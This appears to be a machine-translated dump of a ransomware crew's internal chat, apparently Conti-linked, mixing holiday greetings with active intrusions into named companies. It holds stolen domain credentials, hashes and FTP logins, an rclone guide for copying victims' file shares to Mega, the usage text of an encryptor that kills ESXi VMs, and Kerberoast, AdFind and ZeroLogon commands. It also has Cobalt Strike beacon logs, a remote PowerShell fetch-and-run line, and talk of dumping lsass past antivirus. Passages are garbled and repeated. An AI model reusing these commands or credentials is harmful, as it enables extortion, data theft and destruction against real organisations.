I'm a kind, good guy who allows you to use cheats, i.e., to chase your
Hash on my GPUs and dictionaries, which don't take five minutes to compile...

Just one thing, please don't complicate my work.... If NTLM, NTLM and Md5/sha1/\'some us\'...

`FORMAT user hash
```
MD5 aperia 4c1874760fb49ebdabadd6cc4232ed7b1
NTLM miriam 669bfafdb4990fe1c953f8ac5a15586d
SHA1 luke 8a233d0252d2c659b3a26cf4cf25d59d409615ab
```
And here's the kicker - it's DCC2 (I fucked them!)
`$DCC2$10240#techpilonm#a056cd163d1edf16d4827d2b0dd5945a:%TGB4rfv`


Here are the speed stats:

```
MD5 80696.7 MH/s [ 84616622899 tries/sec ]
Sha1 26210.2 MH/s
NTLM 134.0 GH/s
DCC2 1044.4 kH/s

BitcoinWallet 17111 H/s [ 17111 attempts/sec ]
```

If I still have to chase that config does not brute force something because again MD5, I think it's a shame.
***
[serviceman's voice](https://hashes.com/en/tools/hash_identifier)
Go in, check it out, throw.... Ah site is also provided with their database piercing service...
([Decrypt](https://hashes.com/en/decrypt/hash) like to call it)

_here's more
`https://crackstation.net/`
`https://md5decrypt.net/en/Ntlm/`
`https://md5decrypt.net/en/`
`https://md5hashing.net/hash`
`https://www.cmd5.org/`
[Cloudtopolis - if you want to fuck with me](https://github.com/JoelGMSec/Cloudtopolis)


So # ATTENTION !!!

`FORMAT user hash`
cpPudgesubzerojaxtesttest_uploadbarakaSaulGoodmanpopulyaet rolled back the OS ne terayte skoro buduu I do not have big trabla in ls sent@all hello all, who has an image of Windows 7? Pudgesubzeromango me to go away for 1-2 hours and will until morningfiksanempisyat for now fix files via sendspacevampirvampir. All in all good, just restoring all the data. My computer fucked up, I'm transferring everything to a new one. It should be ready in the morning. Anything to do? Hi, how are you? I'm joining you,
Happy New Year to all, all and more in the New Year and less trouble!) Happy holidays to you, men!
Let everything go as planned)Happy Holidays to all! May our wishes come true!!! Happy New Year to all, may the next year make all expectations come true✊🏼Welcome greetings!!! May things get better in the new year.  A firm handshake! +++ Happy New Year )Happy New Year, men:innocent:Happy New Year to you all, Bro!!!:snowman2:Happy New Year to all, we will find you in the new year :)@all Hey there! Happy New Year to all! Who gets my salary - write to me in person :) https://xakep.ru/2021/06/25/windows-ad-book/SaulGoodman
``OK``.
DO NOT TAKE IT
``````
GUYS ON THE LOKO, KNOCK IT OFF THIS NETWORK
+ tvin here ?let me see @steven how much did you download ?@steven give me the build here for 24 hours alreadywww.ausol.com.ar_TEAM_Сага when you download I will give you the buildSo let's do it now and then we will locate the downloaded data you did not see ?@steven give me the build here plizsens``
ftp://ausol:Fig8ubff7CfuhyvGTkBfhaIfMxkDCY@23.82.140.100/uploads/
``I just did not try from that one did not want to take off? I see that I took off the computer or something? Thank you)), all domain adminsuol.corp\avillaverde ViniciuS2020$
ausol.corp\avillaverde 4873e655be8862d3ed5dcc70151cb364
ausol.corp\lrobles 90e7db2933e66dc4dff8a41a01d33725
ausol.corp\rodrigo 02a1b246ba950ceabaa929b7b6da783e
ausol.corp\admbck 79baf62189eb6b6c1a680a8b7c276419
ausol.corp\timesync 79baf62189eb6b6c1a680a8b8b7c276419 just in casewww.ausol.com.arausol.corp\avillaverde ViniciuS2020$444 or 556COBA://209.222.101.242:64132
P4C3aATy1mkUlTkTvOhTDwFl2SoRwFUoSMm give dsotupes in coba and pid@steven sessions pulled up, caught up in the language barrier, here spanish, balls do not take off, suggestion. no problem, now rename the channeldomain ausol.corphttps://www.zoominfo.com/c/autopistas-del-sol-sa/372403861 if anything jumped ?he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little problem with the server, he had a little problem with the server, he had a little problem with the server, he had a little problem with the server, he had a little problem with the server, he had a little problem with the server... he had a little problem with the server, he had a little problem with the server....
# Fellas on the net www.ausol.com.ar_TEAM_C don't touch it in hell fill me up for the date ransom
``and fuck, maybe the cookie is just dead,`` it's not like it's in the hash, sonic, when you authenticate by hash, what do you put in the url instead of ``welcome``?
i don't want to run dirbasterom does not helprname my vg to domain? he means write the domain on the machine from which you are connecting and how do i put it in the domain if it does not connect to vpn? i put the virtual in the domain as they have, there check for domain remember please how to work around EPC check sonic?he problem is that he netifikat generates ssl 3 and everything will go in the settings of the Internet explorer ssl should psotavit if we solve the problem - tell you how to solve it does not help) yes, I have this often, strangely enough for me to press edit connection helps, Remember the login to ipn account, then click ok and enter the password - will connect + is also often the same error Credential or SSLVPN configuration is wrong, the error code -7200 from the nix client openfortivpn all ok, but with the Windows I can not come in, what could be the problem?i got a -7200 error on fortivpn with valid credentials? it's probably just a dead cookie. i don't know if it's a hash error or not, but i can't log in with a hash error.
i don't want to run dirbasterom does not helprname wg to domain? he means write the domain on the machine you are connecting from and how do i put it in the domain if i can't connect to wpn? i put the virtual in the domain like they have, there is a check for the domain, please remember how to work around the EPC check on sonic?i saw only webcloud and by default disconnect via 2fa code in lokalek not deplauded in lokalek or only by web in claud sendinel one? @all who worked with sentinel one console? i dont use mega client) and event triggers are the same (if configured), the main thing is that i dont detect signature on it is the same as with the desktop mega client i think on that why?
in larder cortices this thing will be stolen, right? can be immediately improved) it was originally installed through the rdp, from the user. and to work through the coba, from systems, the rclone must point to config C:\Users\user\.config\rclone\rclone.conf
and i still can not find the path. i tried to mount a disk, but it did not work. that's how it is with me) only if the session from the admin open through the rdp, then it will only be happyxm
I've tried to open a session with an admin. when using it write if something is missing in the functionality, finalize it)tried it, normal tool) thank you really now on the rdp do not need to get into the cool, thank you is generally convenient, immediately after the ball put all the fs to skaii and went to do things) normal stuff should look only I have through the koba did not get something to copya))))) heh heh
okay
it means colleagues work with it, ok) we are also in business then)articles about it just started to use it as I understand it```
Egregor RaaS Continues the Chaos with Cobalt Strike and Rclone
``Is the http protocol on any port in the process? how is it visible/not visible in the system after installing what protocol? in 50 minutes 10gb download do it for coba) https://github.com/rclone/гсІопевот more a guide on it
Hi all! Those who download files and everyone will find it useful! Very cool thing, RCLONE
now there is no need to unzip mega files! everything is very quiet and unnoticeable!
I do not know how to describe it)
download rclon from the off-site. rclon.exe put it in the folder you need, then follow the manual.
clone everything you need. everything is downloaded via the clone, so the download speed is high.

Here's the guide. It's simple
https://rclone.org/mega/

next command to download

rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12

remote:NT - change only this.
"remote" is the name of your mega.
"NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself.

example

rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
Happy Christmas Eve to everybody! :)Happy New Year to all !!! Happy New Year to all !!!) :partying_face: :tada:Happy Holidays to all)Happy New Year !!! :champagne_glass:``
I JOIN IN WISHING A HAPPY NEW YEAR !!!! HURRAH HURRAH HURRAH !!!!!!
```:champagne:Happy New Year !!! URA - URA - UURRRRR! Happy New Year to all the guys:raised_hands:Happy New Year to all, the main thing is health! Happy Holidays to all!!! Happy Holidays to everybody! :pray:I join in congratulations! All with a holiday! I wish everyone in the next year to progress up as much as possible and respectively, the maximum profit!!! Hello to all! Happy Holidays! All the best wishes in the new year! Happy New Year to everybody!) Happy New Year to everybody!!! :) Happy New Year, gentlemen! :snowman:Happy New Year guys! All the success, health and good luck in the new year! Same to you!)) Happy New Year! :fireworks::partying_face:Happy New Year to All!!! :wink:  :handshake::champagne:Friends, I want to wish everyone a Happy New Year.
We did a very good job this autumn. All, both beginners and more experienced members of working groups have grown professionally, those who lacked diligence or technical background left us naturally, let's wish them only success in other endeavors.
All those who have gone through difficulties of mastering new tasks are with us next year, and, I am sure, will continue to evolve by learning new things and expanding the horizons of perception = )
With each passing month turnover and quality of work only grows. I am sure that 2021 will be a landmark year :-) After the holidays we will have small changes and improvements, but none of them will be disputable.
Well done, everybody. Thank you all! Who has this case? Check the vm list on esxi before the lock to be sure, you can do it with a command (esxi shells):
vim-cmd vmsvc/getallvms``````
Parameters to start the unix version

--path
     If this parameter is used, the locker will encrypt files at the specified path. This parameter is obligatory, without it the locker won't encrypt anything.
     ./encryptor --path /path
     
--prockiller
     Kills all processes which interfere with opening files.
     ./encryptor --path /path --prockiller
     
--log
     Enables logging of all actions and errors
     ./encryptor --path /path --log /root/log.txt
     
--vmkiller(For esxi only)
     Turns off all virtual machines
     
--vmlist(For esxi only)
     Sets a file with a list of virtual machines that should not be shut down. One line for each VM
     ./encryptor --path /path --vmkiller --vmlist /tmp/list.txt

--detach
      Disconnects the process from the terminal.
So that if an ssh session crashes, the locker will keep working
And the files won't get corrupted.

ESXi version SHOULD BE REQUIRED separately


If it doesn't start somewhere, I need os, kernel version and glibc version
/lib64/libc.so.6
``webroot stalls dllinject from cobalt
on the balloon sticks? who has tested in the last 2-4 weeks? pour them a full listingamy 30 percent give only listingamy they have only one balloon on the balls of course from different or from different? all from one server downloaded?i'll upload and i can't get into the admin panel, i can't get into the admin panel, i can't get into the torus, it's laggingmayakki like i asked them to choose 2 files, not leoni they asked for a folder, listing sent a note, kids, there are still pc's schmiffed. bye myself sitprivet and wish you Happy Holidays and Merry Christmas ! :))) I'm in touch, write me when there's something. Hi. Hi, I'll be giving out tasks, what are the tasks for today?all hellojeremytonylexmanternert3chnologhelloworld123 kerberoast attack via vpn - hash removal with a kred` ``Rubeus.exe kerberoast /creduser:domain.int\sdestin /credpassword:Akeelah$14 /domain:domain.int /dc:10.254.0.20 /outfile:c:\programdata\IntelGX.log /format:hashcat
``--------- work of the adfynd through the vpn
in -h ipac dc pdc
then domain
+ account valid from AD ``adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "(objectcategory=person)" > ad_users.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "objectcategory=computer" > ad_computers.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -sc trustdmp > trustdmp.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -subnets -f (objectCategory=subnet) > subnets.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "(objectcategory=group)" > ad_group.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -gcb -sc trustdmp > trustdmp.txtda all normal already figured outprivet from what?Hello Sorry, overslept a little, bring me up to speed all pivetday at 77? tomorrow at the lockWhat time is the assembly of the MSC? if it will lock you then what will you do?You'll have to transfer it to the other one via the dedicator first, then to the other mega at 8-9 tonight... or were they on the mega you fucked up? there's a lot of data there or not if we finish the milk tomorrow we can let it go under the knife tomorrow to pump milk or start pumping conextoga\which network is better to take tomorrow:wave:hello hellohelo maza faka:zany_face:hellohadn't been there for 2 days, now in normal modewill report back to you soon I will wait for the distribution tomorrow morning mimilk finish and nothing on the locker is not ready hostrubrandon already pumpingdeads ready?i'm here i was out of light who's online? and by 9 no one what's the point of gathering everyone at 8 am + i'm in place, waiting for the deadlocks will be ready for tomorrow morning ask me please, deadlocks ready for delivery? steve hello! wait i just came over there are two networks, i'll take a look Steve, you have something interesting? i saw twin's coba, the network i gave you in pt is still dead.
i think it will be ready by tomorrow halfway through tomorrow maybe even today is there a session from netfinish?
all three of them will be done by the end of the week for sure.
there's 240 cars on the AD
but at the same time 60+ servakovmne tooada, now there will be a couple of vpnchik) have a job? sit without delahm, skin in a leech plzrode not with the old connectsHi all, the password from the coba tween changed? m? I looked there in general even something of mine there was )masonzvhhitechTyrVanoa all foundPlease share registration key to proxyfaerpeace question who online?
help for trustsanyone give sharpshooter a master key to collect passwords
if so tell me how to check a quick one-tool just
no dirt, or just open a coboy somewhere with an active session@all give me please socks5 any usa working))) need it urgently and do not have access at hand, just tunnels[ ](https://stylebrooks.com/group/general?msg=ui2m2k6N3xkyWqfAX) and look at ``
net view \\host /all
`oko? I'll see `net view is a handy thing, I mean, who is exploring spheres/servers, via shell dir, file browser or rdp? maybe even more convenient ways there? net view please@all brothers, write in ls besides charfinder who uses what method to find goodies?thank you exactly://www.ostpstviewer.com/парни hello all. stole mail ost. can not find how to read. was some kind of site. who knows ?
I'll look)+@alter do not know about the others, I do not have the right to change the passwordWe strongly recommend that you check your machines for possible bookmarks, change passwords to this and other rockets too, until the weekend do a little internal securiti audit as time will be@all Considering that many ask this question in light of recent news about the Ministry of Health of Ireland. I want to say that no one here has anything to do with this attack, we are NOT attacking gov resources, hospitals, airports or anything like that, and we won't.I'm heretout@all who's online? need to take a bot from vnts crapshot thankshttp://github.com/ferreirasc/scripts/blobs/27bb7f7f423efa6e9820ff4a9e2624b719978acbc2/SharpPrintNightmareexesharpPrintNighmare have you got it knocked down?)) change the coboo they start it to "interfere" you or what I z) your sample got to AV so it should already be in the blbl should scan the botyn what do I delete?))) me gasket) I can only remove the sheetscannered it looks like ``08/26 18:15:25 *** initial beacon from Lily.Winterfeldt@10.125.205.231 (SRVMDKHQN600KUH)
08/26 18:15:25 *** initial beacon from MFornell@172.24.36.6 (Dev-j64HtrrR0v)
08/26 18:15:25 *** initial beacon from PHeimer@172.22.26.173 (SRVYs7hW)
08/26 18:15:25 *** initial beacon from GodertC@192.168.221.120 (lWrzijLoyG)
``hanypots probably to be exact900 bots just show me a couple of lines show me the logs continue:D about a hundred bots came to the coba what newsletter? did someone do a newsletter now? so? without a hook trying to run a hike tried the coba 4.tried koba 4.2 without the hook? tried koba 4.2 without the hook and got the same thing, wrong authorization file, I don't know what the heck is up
today should turn on hello, I'm not busy yet, waiting for when steve in the group is free may need someone to help with the case? thank` ``
Vampir
DHJ7i!%td6sg1%&^FDRa
https://simonty.com/
``Hi, me too register on the forum plz? Long buksuyu with the case`` ``
lssyxxenLocq7m2IhQJIDmkmiW2b8eh5o4VSkXcgf4Ge03KIybJV8rFLBUYzrXMj
```
I'll try again, no reshooting, just no new sessions.i have a key logger that works? i'll look at it, i'll look at it. i need their data on the deck. let's give them a full listing. they only have a listing for 30%. they only have one listing. of course, all from one server. hey, can someone share his account on xaker.ru? happy New Year !!!!!! Be happy:raised_hands:Soedeneyatsya to congratulations! Team! :wink:Thank you ! Likewise!
Happy New Year to all the guys !!!
I see what you're thinking.
thanks a lot shortly as on the router you enter the same way on the web and on Fortik for example 192.168.0.1 as a rule there) see the gateway is a hardware solution everything got it thanks, got it)
how to find fortik admin?
it is on one of the servers should be? for example per thread max 500kb, i download 10 threads at once i.e. the same file is downloading at 5000kb/snooo no fortik have admin area, you need to go there and turn off firewall rules, i also have no case with fortik everywhere restrictions and traffic jams, is it necessary to get it through saba? have access to fortik admin area? yesfortik only downloads archives, but it's really slow what can block downloading on server?
on the host no avera, rklon and mega download gets up at the very beginning.by ipi seems to needa if just by hostname? ``beacon> shell ping ETLHODOPR01.etlife.com
[*] Tasked beacon to run: ping ETLHODOPR01.etlife.com
[+] host called home, sent: 58 bytes
[+] received output:

Exchanging packets with ETLHODOPR01.etlife.com [10.160.1.68] with 32 data bytes:
Response from 10.160.1.68: number of bytes=32 time=187ms TTL=125
Response from 10.160.1.68: number of bytes=32 time=188ms TTL=125
Response from 10.160.1.68: number of bytes=32 time=187ms TTL=125
Response from 10.160.1.68: number of bytes=32 time=187ms TTL=125

Ping statistics for 10.160.1.68:
    Packets: sent = 4, received = 4, lost = 0
    (0% loss)
Approximate time of reception-transmission in ms:
    Minimum = 187msec, Maximum = 188msec, Average = 187msec

beacon> execute-assembly C:\soft\SharpZeroLogon.exe ETLHODOPR01.etlife.com -reset
[*] Tasked beacon to run .NET program: SharpZeroLogon.exe ETLHODOPR01.etlife.com -reset
[+] host called home, sent: 114277 bytes
[+] received output:
Performing authentication attempts...

[+] received output:
Unable to complete server challenge. Possible invalid name or network issues?
``Yes, it's pinging DC ?``execute-assembly C:\soft\SharpZeroLogon.exe ETLHODODR01.etlife.com -reset
``````execute-assembly C:\soft\SharpZeroLogon.exe ETLHODODR01.etlife.com
``Show how you start, but the target name is exactly right``Unable to complete server challenge. Possible invalid name or network issues?
Kot'nt know why zerologon writes not the first time in different networks such fuckin' bullshit, of courseyou have the same versions of coba and timeserver? if constantly a bug, then deal with it is not systematicTill you find it easier to take a new dazh, many dependencies, from the coba, to hosterne met this shit?but it sometimes works, mbe it's still possible to ozhvit)) and not kobanu dedik, it's a fact)so mbe dedikon fuckin, not koba?) sure, you can change the dedikon, but I want to fix it)if it is easy and no problems in other machines not in koba then it's the network not terrible comments and creeds fly but I easily and without problems open beacon other machines do reset long enough koba is not cluttered by itself? does it take a long time to load when you connect to a coba? does a bare ppl like ekse behave the same? and in all networks this shit? maybe someone has faced and beat this shitopen beacon on the deck, and there is nothing, enter commands - no reactionA more? what do you mean beacon stops working? hello everyone, can anyone tell me how you can beat the shitty response from the dedicator to the tem server, beacon stops working oftenRklon is also convenient to take a listing of files from the fs, to study before downloading, quickly makes
```
rclone lsl "D:" >> C:\listing.txt
``[ ](https://stylebrooks.com/group/general?msg=bEwLBjZpFRkjLMvbT) this command won't show the folders in a megabyte, for example, or on cftp[ ](https://stylebrooks.com/group/general?msg=73N4hKedEtTrFYPZz) how is it different from shell dir /s /b /o:n /ad ?appreciate, thanks maybe somebody will be interested - rclone can list the folders on the server
``rclone ls remote:path # lists a re
``or just zip it up is it realistic to write a cna that would put an option in the coba in the file manager to zip a folder and immediately download it? that was fucked with tm I remember, I wondered how he troilis through it ok ?
webroot ?
simantec ? TM ?cisco edr, falcon, eset, sofosi in our experience that meet our cobalt injector which is not that fuckin@all give me a list of avers where our shellcode injector does not start conti normally[ ](https://stylebrooks.com/group/general?msg=n2Wre72jLwCfktF2J) change the config
wusa.exe > rundll32.exe
change the config will be enough gmer or an analogue that kills processes, but it's in emergencies, and sometimes it swears at them guys, who killed the webroot on the pass? I don't think it's the antivirus. It's not allowing you to crash the binary to the specified path. You have to change the path and name of the executable in the profile.
[-] Could not connect to pipe: 2
No, I want to test one tool on a carbon, but I haven't tried it. Would you like to set it up?
if you meet them, you'll understand what i mean)@t3chnolog what kind of antiviruses are they?)))@all a minute of attention
who have in work cases with evil antiviruses like cilance/crowdstrike/firewire/carbon and have admin rights on at least one host - write to pmoffline_winpwn.ps1 for machines without internet access - use commands from manual after importing ``Import-Module .\WinPwn.ps1
```
or
``iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
``That's the same way you looked at it in the transfer list``.
lssyxxenLocq7m2IhQJIDmkmiW2b8eh5o4VSkXcgf4Ge03KIybJV8rFLBYzrXMj
```
find out who's id? mmm? kk```https://www.zoominfo.com/c/arrow-material-services/355399602
7 Servers 0 Works
ftp://EPFSOpItzNwIpTzaB6d:gYjW79f9VZ20l2fjItXBaMOtNyJQMD@23.82.140.100
Arrow Material Services is a leading provider of logistics, handling, terminal operations....
Revenue: $51 Million
Locker: Conti
Works: Fury,Steven,Sonar
Kk write the report, Fury started to localize there? PART
``Ping request could not find host arrow-nb204.AMS.local. Please check the name and try again.
Ping request could not find host arrow-dt219.AMS.local. Please check the name and try again.
Ping request could not find host arrow-dt218.AMS.local. Please check the name and try again.
Ping request could not find host arrow-nb224.AMS.local. Please check the name and try again.
Ping request could not find host ARROW-NB216.AMS.local. Please check the name and try again.

Pinging arrow-nb231.AMS.local [10.2.7.5] with 32 bytes of data:
Reply from 10.2.4.61: Destination host unreachable.
``And it's like all the winks are off-line'' PING SERV
10.2.4.62
10.2.4.64
10.2.4.63
10.2.4.79
10.0.168.3
10.0.168.1
10.0.168.2
``Okay today at 7 am loc@alter here we need to build@fury balloons again and we can close them good goody goody goody, wait for steven and put them on download, we'll close them tomorrow`` ``information for download
\AMS-HYPERV01.AMS.local\D$\Hyper-V\Virtual Hard Disks
\AMS-FS01.AMS.local\d$\Backup\jengel\Documents
\AMS-FS01.AMS.local\d$\Company Shared Files
\\AMS-FS01.AMS.local\d$\Documents
\ams-sndb01.AMS.local\e$\MSSQL2017Backup
``Knszczas 20-30 minutes and I'll give the serverszczas try to pour on ftpparni on the mega so far not lieutenants, go look at the balls , and put on the pump , here's the mega. It's paid for, the Confurm is still going on.
``laposberrrg@outlook.com

KJDBu2bd&*@*&@(*YU@IOnxlknx
``Kk after tomorrow we'll put them up for uploadsGreat8serv 28 workthere are so many servers. I'll go to the balls to see what to download while the GAS is scanning.``AMS\amsadmin @rr0wM@t3r1@ls
I'll try the balls with tool chain1092 I'll take the balls off and pull them apart I'll pull the comp up what are you guys doing there?i have pulled my grandfather, now we are going to take off the hellsonar, please release it all rebooted all rebooted me batinkok i have not rebooted yet i need to take off the ad green marking i have pulled the grandfather) majikkk, now i will do it myself. i got kicked out of the rip from my own rodeo, but there is a ripconnected and i can not connect to your rodeo, pull the bot via speedtestock command, but apparently copied it wrong - does not go ``COBA://172.96.143.178:40610
sDBkQSRs9oW7Q7Q8rgydk40J9kVbdThQXeJ1P
``I tapped into this coba
COBA://192.254.79.154:35752
GpleevXlouzccVl9FJ8U9Tdivc1sfjyGqt wait for which coba to enter in the end? all sorted out jdk reinstalled and everything worked )kkda sec I have something coba now I will figure it out.... 
GpleevXlouzccVl9FJ8U9Tdivc1sfjyGqtnishtyak, now I will find out which kba work? I have the first 2 minutes on the cracks already workingahead, but I immediately kicked out, so someone is working on them. will have to try early in the morningokdate will try to raise so, look, there are cracks in the WHOH Hi) all welcome @Fury take the guys and jumpahead ... ) all the same sessions to reshoot kobyda no matter what I do not about it)I have 4.2 kobaya did not download) hey hey, have anything to do? or all already downloaded?[ ](https://stylebrooks.com/group/general?msg=t7M8HyCrrotTqF558) datsnet domainremen remind pliz in the meter to check the local account instead of the domain . put?[ ](https://stylebrooks.com/group/general?msg=J4NsNkEYgthib8Kko) correctly understand that these parameters disable the log? and why not wireguard? he same faster and more vanilla[ ](https://stylebrooks.com/group/general?msg=idNukopPfPaJR3jg6) this is a good manual, and if you sign servers on the VPN server - think what happens when you compromise the VPN server) when you compromise the certification server, you can listen to the trafficThanks, I did not know, very interesting) center - server = one and the same. but i did not know that you can isolate it. it's funnytut detailedhttp://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-18-04-гцне server and the center, certificates you can sign at your[ ](https://stylebrooks.com/group/general?msg=GqosiGAtzTmJAy588) do not forget in the configuration of the server.conf
add ``verb 0
log /dev/null
status /dev/null
log-append /dev/null ``[ ](https://stylebrooks.com/group/general?msg=ufzwpLDEwcmHPSFWq) you either have the wrong expression, or I do not know how it will be the certification server on the local machine? may be just do not store the keys on the server, do not install certification centers on the server itself, do it on the local machine....[ ](https://stylebrooks.com/group/general?msg=4Jv3QiMbBJivNTi89) https://github.com/Nyr/openvpn-іпѕтаІІраскопаю vpn script if you use publick vpn then only on the output, before it you should be all rightset your vpn servers on different hostings on what to transfer?interpol - cyberbez))))[ ](https://stylebrooks.com/group/general?msg=q3jqLDMS36ng2P3Zo) of course competitorsbylvrp service what was doublevpn ? competitors ? and what about doublevpn ? can be crypto dll coba and through the session pull out with mimicatak from admin and doa local admin rights are there ? hysterics((need to know if the av screams when dumping through the task manager Hello all ! :handshake:
Guys, how can lsass be dumped with AV Microsecurity on board?:face_with_monocle:+When AV shouts no, he means yes)) very much swearing, but let it pass ehhetak also with makaffy was, earth to his soul)))) shortly everything you need to know about modern antiviruses could not beat the trend micro, let ekse, he gives a fuckPlease can someone bicon crypt?remind me how you can steal chrome cookies in JSON format from a cobalt session.
Remind me before there was CIP telephony with forums - I forgot their name / contact@all Friends, you write to me periodically with different technical problems of different complexity, to write a script, to correct a splot, to test something in closed mode, to correct a ready-made script on the git, and so on.
I want to remind you that we have a full-fledged development department for such tasks, where responsible persons will be assigned, but only if you yourself will provide full-fledged testing of the ordered product and share it with your colleagues. Please take this carefully and responsibly, if you have requests for such - write to me in PM what you need to write / to correct / to complete and so on@all sicaf-cosmetiques.fr again lost the owner and the confab is not!!! URGENT! need info1. scan for vulnerabilities or watch the update poke to understand the fix is rolled or not.
2. Paleoad is needed, create a job and lift through it (i can be wrong let them correct)
3. Saw the manual cool from Ragnarek there was this 1 How well it works on the patched 2008?
2 Is it necessary to start a session in msf or is it necessary to tunnel through proxy in Cobalt?
3 Maybe there is a simple manual?
Please share your experiences who worked with Exploit EternalBlue in MSF ...? Whose? I understand, thanksgreatest thing is that 90% of the time 1 naprol to everything) also in the software can be IT folder with passwords, but also they can be passwords in excels found on the desktop and in the docks, called passwords) Once these same excels found in van drive authorized in the mail bodyHi all. Podskazh please, where can I find the Credits from Datto? Viam, orbs, cypress, chrome is understandable. Any other options, where they are most often stored? Maybe some way out of the clients can?[ ](https://stylebrooks.com/group/general?msg=ynnSjY62yQAhZMDoG) cps, added to the notes `execute-assembly /root/Desktop/TOOLS/bloodhound_master/BloodHound_master/Ingestors/SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --excludedomaincontrollers --windowsonly --OutputDirectory C:\programdata\ guys can I add to the confab about tool chain? you shoot sharphound, you drop it into bloodhound -profite in two words who can explain how bloodhound start using?[ ](https://stylebrooks.com/group/general?msg=TXftyYQdkvMqd6B9X) resolved through the replacement
wusa.exe
to
rundll32.exe[ ](https://stylebrooks.com/group/general?msg=4SXBDzeGnxSzwguH4) do you need to connect as local admin? or enable local admin service?
jhmW6WXkvsAwheK2P5XiR8Cm7k6dYgnFAcD8y6ONiZBZbEQIUFk1gVjdnpSwqHDq
```
look whoseHello, everyone.
If anyone has debugged CVE-2021-21985 for vCenter, post a PM, please.@Chuck there is a .txt variant, it went better for meHello, does anyone have a video on MS17? hello, tell me hosting for Іncxp guys proxy adfind as app and go to proxyfind add``.
adfind.exe -h 10.80.9.5 -u domain\user -up p@$w0rd -f "objectcategory=person" > ad_person.txt
As an option, specify the IP address of the domain controller and try to build ad_person via sockets.
beacon> execute-assembly /home/user/soft/ActiveDirectory/adfind/AdFind.exe
[-] execute-assembly error: max upload size is 1MB
``Of course lol, AV already bans legitimate tools because their hack groups use them lol (I mean the adfind itself) I haven't tried it, but I wonder if it'll work
they use winapi there, i think it's written in sycharp, try to do it via execute-assembly or an alternative way to remove the adfind where there's an ab that breaks the adfind, like sofos?msg=t7M8HyCrrotTqF558) datunset domainremind me please, in the mete to check the local account instead of the domain . put[ ](https://stylebrooks.com/group/general?msg=J4NsNkEYgthib8Kko) correctly understand that these parameters disable logs? and why not wireguard? it is faster and more vanilla[ ](https://stylebrooks.com/group/general?msg=idNukopPfPaJR3jg6) this is a good manual, and if you sign servers on the VPN server - think what happens when you compromise the VPN server) when you compromise the certification server, you can listen to the trafficThanks, I did not know, very interesting) center - server = one and the same. but i did not know that you can isolate it. it's funnytut detailedhttp://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-18-04-гцне server and the center, certificates you can sign at your[ ](https://stylebrooks.com/group/general?msg=GqosiGAtzTmJAy588) do not forget in the configuration of the server.conf
add ``verb 0
log /dev/null
status /dev/null
log-append /dev/null ``[ ](https://stylebrooks.com/group/general?msg=ufzwpLDEwcmHPSFWq) you either have the wrong expression, or I do not know how it will be the certification server on the local machine? may be just do not store the keys on the server, do not install certification centers on the server itself, do it on the local machine....[ ](https://stylebrooks.com/group/general?msg=4Jv3QiMbBJivNTi89) https://github.com/Nyr/openvpn-іпѕтаІІраскопаю vpn script if you use publick vpn then only on the output, before it you should be all rightset your vpn servers on different hostings on what to transfer?interpol - cyberbez))))[ ](https://stylebrooks.com/group/general?msg=q3jqLDMS36ng2P3Zo) of course competitorsbylvrp service what was doublevpn ? competitors ? and what about doublevpn ? can be crypto dll coba and through the session pull out with mimicatak from admin and doa local admin rights are there ? hysterics((need to know if the av screams when dumping through the task manager Hello all ! :handshake:
Guys, how can lsass be dumped with AV Microsecurity on board?:face_with_monocle:+When AV shouts no, he means yes)) very much swearing, but let it pass ehhetak also with makaffy was, earth to his soul)))) shortly everything you need to know about modern antiviruses could not beat the trend micro, let ekse, he gives a fuckPlease can someone bicon crypt?remind me how you can steal chrome cookies in JSON format from a cobalt session.
Remind me before there was CIP telephony with forums - I forgot their name / contact@all Friends, you write to me periodically with different technical problems of different complexity, to write a script, to correct a splot, to test something in closed mode, to correct a ready-made script on the git, and so on.
I want to remind you that we have a full-fledged development department for such tasks, where responsible persons will be assigned, but only if you yourself will provide full-fledged testing of the ordered product and share it with your colleagues. Please take this carefully and responsibly, if you have requests for such - write to me in PM what you need to write / to correct / to complete and so on@all sicaf-cosmetiques.fr again lost the owner and the confab is not!!! URGENT! need info1. scan for vulnerabilities or watch the update poke to understand the fix is rolled or not.
2. Paleoad is needed, create a job and lift through it (i can be wrong let them correct)
3. Saw the manual cool from Ragnarek there was this 1 How well it works on the patched 2008?
2 Is it necessary to start a session in msf or is it necessary to tunnel through proxy in Cobalt?
3 Maybe there is a simple manual?
